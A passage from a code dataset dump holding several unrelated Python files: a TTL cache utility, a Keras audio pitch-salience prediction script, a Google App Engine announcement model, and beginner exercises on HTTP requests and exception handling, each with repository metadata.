ValuesView\nfrom typing import Any, Callable, Generic, Iterator, Optional, Tuple, TypeVar\n\nimport attrs\n\n__all__ = (\"TTLItem\", \"TTLCache\", \"NullCache\")\n\nKT = TypeVar(\"KT\")\nVT = TypeVar(\"VT\")\n\n\nclass NullCache(dict):\n \"\"\"\n A special cache that will always return None\n\n Effectively just a lazy way to disable caching.\n \"\"\"\n\n def __setitem__(self, key, value) -> None:\n pass\n\n\n@attrs.define(eq=False, order=False, hash=False, kw_only=False)\nclass TTLItem(Generic[VT]):\n value: VT = attrs.field(\n repr=False,\n )\n expire: float = attrs.field(\n repr=False,\n )\n \"\"\"When the item expires in cache.\"\"\"\n\n def is_expired(self, timestamp: float) -> bool:\n \"\"\"\n Check if the item is expired.\n\n Args:\n timestamp: The current timestamp to compare against.\n\n Returns:\n True if the item is expired, False otherwise.\n\n \"\"\"\n return timestamp >= self.expire\n\n\nclass TTLCache(OrderedDict[KT, TTLItem[VT]]):\n def __init__(\n self,\n ttl: int = 600,\n soft_limit: int = 50,\n hard_limit: int = 250,\n on_expire: Optional[Callable] = None,\n ) -> None:\n super().__init__()\n\n self.ttl = ttl\n self.hard_limit = hard_limit\n self.soft_limit = min(soft_limit, hard_limit)\n self.on_expire = on_expire\n\n def __setitem__(self, key: KT, value: VT) -> None:\n expire = time.monotonic() + self.ttl\n item = TTLItem(value, expire)\n super().__setitem__(key, item)\n self.move_to_end(key)\n\n self.expire()\n\n def __getitem__(self, key: KT) -> VT:\n # Will not (should not) reset expiration!\n item = super().__getitem__(key)\n # self._reset_expiration(key, item)\n return item.value\n\n def pop(self, key: KT, default=attrs.NOTHING) -> VT:\n if key in self:\n item = self[key]\n del self[key]\n return item\n\n if default is attrs.NOTHING:\n raise KeyError(key)\n\n return default\n\n def get(self, key: KT, default: Optional[VT] = None, reset_expiration: bool = True) -> VT:\n item = super().get(key, default)\n if item is not default:\n if reset_expiration:\n self._reset_expiration(key, item)\n return item.value\n\n return default\n\n def values(self) -> ValuesView[VT]:\n return _CacheValuesView(self)\n\n def items(self) -> ItemsView:\n return _CacheItemsView(self)\n\n def _reset_expiration(self, key: KT, item: TTLItem) -> None:\n self.move_to_end(key)\n item.expire = time.monotonic() + self.ttl\n\n def _first_item(self) -> Tuple[KT, TTLItem[VT]]:\n return next(super().items().__iter__())\n\n def expire(self) -> None:\n \"\"\"Removes expired elements from the cache.\"\"\"\n if self.soft_limit and len(self) <= self.soft_limit:\n return\n\n if self.hard_limit:\n while len(self) > self.hard_limit:\n self._expire_first()\n\n timestamp = time.monotonic()\n while True:\n key, item = self._first_item()\n if item.is_expired(timestamp):\n self._expire_first()\n else:\n break\n\n def _expire_first(self) -> None:\n key, value = self.popitem(last=False)\n if self.on_expire:\n self.on_expire(key, value)\n\n\nclass _CacheValuesView(ValuesView):\n def __contains__(self, value) -> bool:\n for key in self._mapping:\n v = self._mapping.get(key, reset_expiration=False)\n if v is value or v == value:\n return True\n return False\n\n def __iter__(self) -> Iterator[Any]:\n for key in self._mapping:\n yield self._mapping.get(key, reset_expiration=False)\n\n def __reversed__(self) -> Iterator[Any]:\n for key in reversed(self._mapping):\n yield self._mapping.get(key, reset_expiration=False)\n\n\nclass _CacheItemsView(ItemsView):\n def __contains__(self, item) -> bool:\n key, value = item\n v = self._mapping.get(key, default=attrs.NOTHING, reset_expiration=False)\n return False if v is attrs.NOTHING else v is value or v == value\n\n def __iter__(self) -> Iterator[Tuple[Any, Any]]:\n for key in self._mapping:\n yield key, self._mapping.get(key, reset_expiration=False)\n\n def __reversed__(self) -> Iterator[Tuple[Any, Any]]:\n for key in reversed(self._mapping):\n yield key, self._mapping.get(key, reset_expiration=False)\n", "repo_name": "interactions-py/interactions.py", "sub_path": "interactions/client/utils/cache.py", "file_name": "cache.py", "file_ext": "py", "file_size_in_byte": 4643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 760, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TypeVar", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.Generic", "line_number": 26, "usage_type": "name"}, {"api_name": "attrs.field", "line_number": 27, "usage_type": "call"}, {"api_name": "attrs.field", "line_number": 30, "usage_type": "call"}, {"api_name": "attrs.define", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 55, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 65, "usage_type": "call"}, {"api_name": "attrs.NOTHING", "line_number": 78, "usage_type": "attribute"}, {"api_name": "attrs.NOTHING", "line_number": 84, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 89, "usage_type": "name"}, {"api_name": "collections.abc.ValuesView", "line_number": 98, "usage_type": "name"}, {"api_name": "collections.abc.ItemsView", "line_number": 101, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 106, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 108, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 120, "usage_type": "call"}, {"api_name": "collections.abc.ValuesView", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 146, "usage_type": "name"}, {"api_name": "collections.abc.ItemsView", "line_number": 151, "usage_type": "name"}, {"api_name": "attrs.NOTHING", "line_number": 154, "usage_type": "attribute"}, {"api_name": "attrs.NOTHING", "line_number": 155, "usage_type": "attribute"}, {"api_name": "typing.Iterator", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 161, "usage_type": "name"}]} +{"seq_id": "30814408580", "text": "\"\"\"Script to predict deepsalience output from audio\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport librosa\nimport numpy as np\nimport os\nimport scipy\nimport csv\n\nfrom keras.models import Model\nfrom keras.layers import Dense, Input, Reshape, Lambda\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras import backend as K\nfrom keras.models import load_model\n\nTASKS = ['bass', 'melody1', 'melody2', 'melody3', 'multif0', 'pitch', 'vocal']\nBINS_PER_OCTAVE = 60\nN_OCTAVES = 6\nHARMONICS = [0.5, 1, 2, 3, 4, 5]\nSR = 22050\nFMIN = 32.7\nHOP_LENGTH = 256\n\n\ndef compute_hcqt(audio_fpath):\n \"\"\"Compute the harmonic CQT from a given audio file\n\n Parameters\n ----------\n audio_fpath : str\n path to audio file\n\n Returns\n -------\n hcqt : np.ndarray\n Harmonic cqt\n time_grid : np.ndarray\n List of time stamps in seconds\n freq_grid : np.ndarray\n List of frequency values in Hz\n\n \"\"\"\n y, fs = librosa.load(audio_fpath, sr=SR)\n\n cqt_list = []\n shapes = []\n for h in HARMONICS:\n cqt = librosa.cqt(\n y, sr=fs, hop_length=HOP_LENGTH, fmin=FMIN*float(h),\n n_bins=BINS_PER_OCTAVE*N_OCTAVES,\n bins_per_octave=BINS_PER_OCTAVE\n )\n cqt_list.append(cqt)\n shapes.append(cqt.shape)\n\n shapes_equal = [s == shapes[0] for s in shapes]\n if not all(shapes_equal):\n min_time = np.min([s[1] for s in shapes])\n new_cqt_list = []\n for i in range(len(cqt_list)):\n new_cqt_list.append(cqt_list[i][:, :min_time])\n cqt_list = new_cqt_list\n\n log_hcqt = ((1.0/80.0) * librosa.core.amplitude_to_db(\n np.abs(np.array(cqt_list)), ref=np.max)) + 1.0\n\n freq_grid = librosa.cqt_frequencies(\n BINS_PER_OCTAVE*N_OCTAVES, FMIN, bins_per_octave=BINS_PER_OCTAVE\n )\n\n time_grid = librosa.core.frames_to_time(\n range(log_hcqt.shape[2]), sr=SR, hop_length=HOP_LENGTH\n )\n\n return log_hcqt, freq_grid, time_grid\n\n\ndef bkld(y_true, y_pred):\n \"\"\"KL Divergence where both y_true an y_pred are probabilities\n \"\"\"\n y_true = K.clip(y_true, K.epsilon(), 1.0 - K.epsilon())\n y_pred = K.clip(y_pred, K.epsilon(), 1.0 - K.epsilon())\n return K.mean(K.mean(\n -1.0*y_true* K.log(y_pred) - (1.0 - y_true) * K.log(1.0 - y_pred),\n axis=-1), axis=-1)\n\n\ndef model_def():\n \"\"\"Created compiled Keras model\n\n Returns\n -------\n model : Model\n Compiled keras model\n \"\"\"\n input_shape = (None, None, 6)\n inputs = Input(shape=input_shape)\n\n y0 = BatchNormalization()(inputs)\n y1 = Conv2D(128, (5, 5), padding='same', activation='relu', name='bendy1')(y0)\n y1a = BatchNormalization()(y1)\n y2 = Conv2D(64, (5, 5), padding='same', activation='relu', name='bendy2')(y1a)\n y2a = BatchNormalization()(y2)\n y3 = Conv2D(64, (3, 3), padding='same', activation='relu', name='smoothy1')(y2a)\n y3a = BatchNormalization()(y3)\n y4 = Conv2D(64, (3, 3), padding='same', activation='relu', name='smoothy2')(y3a)\n y4a = BatchNormalization()(y4)\n y5 = Conv2D(8, (70, 3), padding='same', activation='relu', name='distribute')(y4a)\n y5a = BatchNormalization()(y5)\n y6 = Conv2D(1, (1, 1), padding='same', activation='sigmoid', name='squishy')(y5a)\n predictions = Lambda(lambda x: K.squeeze(x, axis=3))(y6)\n\n model = Model(inputs=inputs, outputs=predictions)\n model.compile(loss=bkld, metrics=['mse'], optimizer='adam')\n return model\n\n\ndef load_model(task):\n \"\"\"Load a precompiled, pretrained model\n\n Parameters\n ----------\n task : str\n One of\n -'bass'\n -'melody1'\n -'melody2'\n -'melody3'\n -'multif0'\n -'pitch'\n -'vocal'\n\n Returns\n -------\n model : Model\n Pretrained, precompiled Keras model\n\n \"\"\"\n model = model_def()\n if task not in TASKS:\n raise ValueError(\"task must be one of {}\".format(TASKS))\n\n weights_path = os.path.join('weights', '{}.h5'.format(task))\n if not os.path.exists(weights_path):\n raise IOError(\n \"Cannot find weights path {} for this task.\".format(weights_path))\n\n model.load_weights(weights_path)\n return model\n\n\ndef get_single_test_prediction(model, input_hcqt):\n \"\"\"Generate output from a model given an input numpy file\n\n Parameters\n ----------\n model : Model\n Pretrained model\n input_hcqt : np.ndarray\n HCQT\n\n Returns\n -------\n predicted_output : np.ndarray\n Matrix of predictions\n\n \"\"\"\n input_hcqt = input_hcqt.transpose(1, 2, 0)[np.newaxis, :, :, :]\n\n n_t = input_hcqt.shape[2]\n n_slices = 2000\n t_slices = list(np.arange(0, n_t, n_slices))\n output_list = []\n for i, t in enumerate(t_slices):\n print(\" > {} / {}\".format(i + 1, len(t_slices)))\n prediction = model.predict(input_hcqt[:, :, t:t+n_slices, :])\n output_list.append(prediction[0, :, :])\n\n predicted_output = np.hstack(output_list)\n\n return predicted_output\n\n\ndef get_multif0(pitch_activation_mat, freq_grid, time_grid, thresh=0.3):\n \"\"\"Compute multif0 output containing all peaks in the output that\n fall above thresh\n\n Parameters\n ----------\n pitch_activation_mat : np.ndarray\n Deep salience prediction\n freq_grid : np.ndarray\n Frequency values\n time_grid : np.ndarray\n Time values\n thresh : float, default=0.3\n Likelihood threshold\n\n Returns\n -------\n times : np.ndarray\n Time values\n freqs : list\n List of lists of frequency values\n\n \"\"\"\n peak_thresh_mat = np.zeros(pitch_activation_mat.shape)\n peaks = scipy.signal.argrelmax(pitch_activation_mat, axis=0)\n peak_thresh_mat[peaks] = pitch_activation_mat[peaks]\n\n idx = np.where(peak_thresh_mat >= thresh)\n\n est_freqs = [[] for _ in range(len(time_grid))]\n for f, t in zip(idx[0], idx[1]):\n est_freqs[t].append(freq_grid[f])\n\n est_freqs = [np.array(lst) for lst in est_freqs]\n return time_grid, est_freqs\n\n\ndef get_singlef0(pitch_activation_mat, freq_grid, time_grid, thresh=0.3,\n use_neg=True):\n \"\"\"Compute single-f0 output containing the maximum likelihood per time frame.\n Frames with no likelihoods above the threshold are given negative values.\n\n Parameters\n ----------\n pitch_activation_mat : np.ndarray\n Deep salience prediction\n freq_grid : np.ndarray\n Frequency values\n time_grid : np.ndarray\n Time values\n thresh : float, default=0.3\n Likelihood threshold\n use_neg : bool\n If True, frames with no value above the threshold the frequency\n are given negative values of the frequency with the largest liklihood.\n If False, those frames are given the value 0.0\n\n Returns\n -------\n times : np.ndarray\n Time values\n freqs : np.ndarray\n Frequency values\n\n \"\"\"\n max_idx = np.argmax(pitch_activation_mat, axis=0)\n est_freqs = []\n for i, f in enumerate(max_idx):\n if pitch_activation_mat[f, i] < thresh:\n if use_neg:\n est_freqs.append(-1.0*freq_grid[f])\n else:\n est_freqs.append(0.0)\n else:\n est_freqs.append(freq_grid[f])\n est_freqs = np.array(est_freqs)\n return time_grid, est_freqs\n\n\ndef save_multif0_output(times, freqs, output_path):\n \"\"\"Save multif0 output to a csv file\n\n Parameters\n ----------\n times : np.ndarray\n array of time values\n freqs : list of lists\n list of lists of frequency values\n output_path : str\n path to save output\n\n \"\"\"\n with open(output_path, 'w') as fhandle:\n csv_writer = csv.writer(fhandle, delimiter='\\t')\n for t, f in zip(times, freqs):\n row = [t]\n row.extend(f)\n csv_writer.writerow(row)\n\n\ndef save_singlef0_output(times, freqs, output_path):\n \"\"\"Save singlef0 output to a csv file\n\n Parameters\n ----------\n times : np.ndarray\n array of time values\n freqs : np.ndarray\n array of frequency values\n output_path : str\n path to save output\n\n \"\"\"\n with open(output_path, 'w') as fhandle:\n csv_writer = csv.writer(fhandle, delimiter='\\t')\n for t, f in zip(times, freqs):\n csv_writer.writerow([t, f])\n\n\ndef compute_output(hcqt, time_grid, freq_grid, task, output_format, threshold,\n use_neg, save_dir, save_name):\n \"\"\"Comput output for a given task\n\n Parameters\n ----------\n hcqt : np.ndarray\n harmonic cqt\n time_grid : np.ndarray\n array of times\n freq_grid : np.ndarray\n array of frequencies\n task : str\n which task to compute\n output_format : str\n specify whehter to save output as singlef0, multif0 or salience\n threshold : float\n amplitude threshold for multif0 and singlef0 output\n use_neg : bool\n whether to report negative frequency values in singlef0 output\n save_dir : str\n Path to folder to save output\n save_name : str\n Output file basename\n\n \"\"\"\n model = load_model(task)\n\n print(\"Computing salience...\")\n pitch_activation_mat = get_single_test_prediction(model, hcqt)\n\n print(\"Saving output...\")\n if output_format == 'singlef0':\n times, freqs = get_singlef0(\n pitch_activation_mat, freq_grid, time_grid, thresh=threshold,\n use_neg=use_neg\n )\n save_path = os.path.join(\n save_dir, \"{}_{}_singlef0.csv\".format(save_name, task))\n save_singlef0_output(times, freqs, save_path)\n elif output_format == 'multif0':\n times, freqs = get_multif0(\n pitch_activation_mat, freq_grid, time_grid, thresh=threshold)\n save_path = os.path.join(\n save_dir, \"{}_{}_multif0.csv\".format(save_name, task))\n save_multif0_output(times, freqs, save_path)\n else:\n save_path = os.path.join(\n save_dir, \"{}_{}_salience.npz\".format(save_name, task))\n np.savez(save_path, salience=pitch_activation_mat, times=time_grid,\n freqs=freq_grid)\n\n print(\"Done!\")\n\n\ndef load_model_melody1():\n \"\"\"Load the melody1 model and return it (used by Replicate)\n\n Returns\n -------\n model : Model\n The pretrained melody1 model\n \"\"\"\n return load_model(\"melody1\")\n\n\ndef infer_example_melody1(model, audio_path):\n \"\"\"Run a single inference of the melody1 model on an audio file\n\n Parameters\n ----------\n model : Model\n The pretrained melody1 model\n audio_path : str\n Path to audio file to extract melody from\n\n Returns\n -------\n (times, freqs) : Tuple[np.ndarray, np.ndarray]\n Time grid and predicted frequencies\n \"\"\"\n hcqt, freq_grid, time_grid = compute_hcqt(audio_path)\n pitch_activation_mat = get_single_test_prediction(model, hcqt)\n times, freqs = get_singlef0(\n pitch_activation_mat, freq_grid, time_grid, thresh=0.3,\n use_neg=True\n )\n return times, freqs\n\n\ndef main(args):\n if args.task not in ['all'] + TASKS:\n raise ValueError(\"task must be 'all' or one of {}\".format(TASKS))\n\n save_name = os.path.basename(args.audio_fpath).split('.')[0]\n\n # this is slow for long audio files\n print(\"Computing HCQT...\")\n hcqt, freq_grid, time_grid = compute_hcqt(args.audio_fpath)\n\n\n if args.task == 'all':\n for task in TASKS:\n print(\"[Computing {} output]\".format(task))\n compute_output(\n hcqt, time_grid, freq_grid, task, args.output_format,\n args.threshold, args.use_neg, args.save_dir, save_name)\n else:\n compute_output(\n hcqt, time_grid, freq_grid, args.task, args.output_format,\n args.threshold, args.use_neg, args.save_dir, save_name)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Predict deep salience output for a given task\")\n parser.add_argument(\"audio_fpath\",\n type=str,\n help=\"Path to input audio file.\")\n parser.add_argument(\"task\",\n type=str,\n help=\"Task to compute one of \"\n \"all, bass, melody1, melody2, melody3, \"\n \"multif0, pitch, vocal.\")\n parser.add_argument(\"save_dir\",\n type=str,\n help=\"Path to folder for saving output\")\n parser.add_argument(\"-f\", \"--output_format\",\n type=str,\n choices=['singlef0', 'multif0', 'salience'],\n default='salience',\n help=\"Which format to save output. \"\n \"singlef0 saves a csv of single f0 values. \"\n \"mulif0 saves a csv of multif0 values. \"\n \"salience (default) saves a npz file of the \"\n \"salience matrix.\")\n parser.add_argument(\"-t\", \"--threshold\",\n type=float,\n default=0.3,\n help=\"Amplitude threshold. Only used when \"\n \"output_format is singlef0 or multif0\")\n parser.add_argument(\"-n\", \"--use_neg\",\n type=bool,\n default=True,\n help=\"If True, report unvoiced frames with negative values. \"\n \"This is only used when output_format is singlef0.\")\n\n main(parser.parse_args())\n", "repo_name": "rabitt/ismir2017-deepsalience", "sub_path": "predict/predict_on_audio.py", "file_name": "predict_on_audio.py", "file_ext": "py", "file_size_in_byte": 13601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 75, "dataset": "github-code", "pt": "53", "api": [{"api_name": "librosa.load", "line_number": 45, "usage_type": "call"}, {"api_name": "librosa.cqt", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 60, "usage_type": "call"}, {"api_name": "librosa.core.amplitude_to_db", "line_number": 66, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 67, "usage_type": "attribute"}, {"api_name": "librosa.cqt_frequencies", "line_number": 69, "usage_type": "call"}, {"api_name": "librosa.core.frames_to_time", "line_number": 73, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 73, "usage_type": "attribute"}, {"api_name": "keras.backend.clip", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 83, "usage_type": "name"}, {"api_name": "keras.backend.epsilon", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.backend.clip", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 84, "usage_type": "name"}, {"api_name": "keras.backend.epsilon", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.backend.mean", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 85, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 86, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 99, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 101, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 102, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 103, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 105, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 106, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 107, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 110, "usage_type": "call"}, {"api_name": "keras.layers.normalization.BatchNormalization", "line_number": 111, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv2D", "line_number": 112, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 113, "usage_type": "call"}, {"api_name": "keras.backend.squeeze", "line_number": 113, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 113, "usage_type": "name"}, {"api_name": "keras.models.Model", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.newaxis", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 209, "usage_type": "call"}, {"api_name": "scipy.signal.argrelmax", "line_number": 210, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 210, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 261, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 279, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 300, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 331, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 342, "usage_type": "call"}, {"api_name": "os.path", "line_number": 342, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.savez", "line_number": 354, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path", "line_number": 399, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 419, "usage_type": "call"}]} +{"seq_id": "9189867217", "text": "import status_code\nfrom datetime import datetime, timedelta\nfrom google.appengine.ext import db\nimport json\n\nclass Announcement(db.Model):\n Date = db.DateTimeProperty(required=True)\n UDate = db.DateTimeProperty(required=True)\n Title = db.StringProperty(required=True)\n Content = db.TextProperty(required=True)\n \nclass AnnouncementOperation(object):\n @staticmethod\n def CreateAnnouncement(title, content):\n date = datetime.now() + timedelta(hours=8)\n \n announcement = Announcement(key_name = date.strftime(\"%Y-%m-%d %H:%M:%S\"), Title = title, Content = content, Date = date, UDate = date)\n announcement.put()\n \n return status_code.CREATE_ANNOUNCEMENT_SUCCESS\n \n @staticmethod\n def GetAnnouncementList():\n announcements = db.GqlQuery(\"SELECT * FROM Announcement ORDER BY UDate DESC\")\n result = []\n for announcement in announcements:\n result.append({\n 'title': announcement.Title,\n 'content': announcement.Content,\n 'udate': announcement.UDate.strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'date': announcement.Date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n })\n \n return json.dumps(result)\n \n @staticmethod\n def GetAnnouncement(date):\n announcement_key = db.Key.from_path('Announcement', date)\n announcement = db.get(announcement_key)\n if announcement is not None:\n result = [ announcement.Title, announcement.Content ]\n return json.dumps(result)\n return status_code.CANNOT_FIND_ITEM\n \n @staticmethod\n def SetAnnouncement(title, content, date):\n announcement_key = db.Key.from_path('Announcement', date)\n announcement = db.get(announcement_key)\n if announcement is not None:\n announcement.Title = title\n announcement.Content = content\n announcement.UDate = datetime.now() + timedelta(hours=8)\n announcement.put()\n return status_code.UPDATE_SUCCESS\n return status_code.CANNOT_FIND_ITEM\n \n @staticmethod\n def DelAnnouncement(date):\n announcement_key = db.Key.from_path('Announcement', date)\n announcement = db.get(announcement_key)\n announcement.delete()\n return status_code.DELETE_SUCCESS\n ", "repo_name": "rockers7414/MKTZCrew", "sub_path": "announcement.py", "file_name": "announcement.py", "file_ext": "py", "file_size_in_byte": 2394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "google.appengine.ext.db.Model", "line_number": 6, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 6, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.DateTimeProperty", "line_number": 7, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 7, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.DateTimeProperty", "line_number": 8, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 8, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.StringProperty", "line_number": 9, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 9, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.TextProperty", "line_number": 10, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "status_code.CREATE_ANNOUNCEMENT_SUCCESS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db.GqlQuery", "line_number": 24, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 24, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 34, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 38, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 38, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 38, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.get", "line_number": 39, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 39, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "status_code.CANNOT_FIND_ITEM", "line_number": 43, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 47, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 47, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 47, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.get", "line_number": 48, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 52, "usage_type": "call"}, {"api_name": "status_code.UPDATE_SUCCESS", "line_number": 54, "usage_type": "attribute"}, {"api_name": "status_code.CANNOT_FIND_ITEM", "line_number": 55, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 59, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 59, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 59, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.get", "line_number": 60, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 60, "usage_type": "name"}, {"api_name": "status_code.DELETE_SUCCESS", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "1652503246", "text": "from random import randint\n\nimport requests\n\n\"\"\"\nExercise 1\nMake virtualenv catalog. Enter it, and activate.\nInstall 'requests' library, and write simple program, that will take html from any website.\n\"\"\"\n\n\n# Creating new virtualenv - virtualenv -p python3 env\n\n# Instaling requests library in env - pip install requests\n\n\ndef get_html(url):\n r = requests.get(url)\n return r.text\n\n\n#print(\"1#\", get_html(\"https://singlemalt.pl/\"))\n\n\"\"\"\nExercise 2\nWrite a function that take: random list, and the index, as a number. Function should return list element named \"index\".\nIf there is nothing like index, function should return None.\n\"\"\"\n\ndef get_index(list, index):\n try:\n return list[index]\n\n except IndexError:\n\n return None\n\nlist = [\"Rick\", \"Morty\", \"Summer\", \"Beth\", \"Jerry\"]\nprint(\"2#\", get_index(list, 0))\nprint(\"2#\", get_index(list, 5))\nprint(\"2#\", get_index(list, 1))\nprint(\"2#\", get_index(list, 9))\n\n\"\"\"\nExercise 3\nWrite a divide function that will take arguments a and b. Function should check if arguments are numbers, and take\ncare of zero divide error. Function should return result of division.\n\"\"\"\ndef safe_division(a,b):\n\n try:\n return a/b\n except ZeroDivisionError:\n return None\n except IndexError:\n return\n\nprint(\"3#\", safe_division(10,2))\n\n\n\n\"\"\"\nExercise 4\nWrite function that will take phone number. Function should check if number is on your list number (make one). If not\nFunction should return exception with \"no such number\" comment.\n\"\"\"\n\ndef phone_number(number):\n phone_list = [774896355, 990825630, 510836492, 276941862, 973245816]\n\n if number not in phone_list:\n raise Exception (\"No such number on the list\")\n\n return \"Cellar No\"\n\nprint(\"4#\", phone_number(990825630))\n\n\"\"\"\nExercise 5\nThere You have some simple riddle. Computer takes a random number between 1 and 10, and You have to guess it.\nAnalise code, and add exception methods.\n\"\"\"\n\nguessed = False\nrnd = 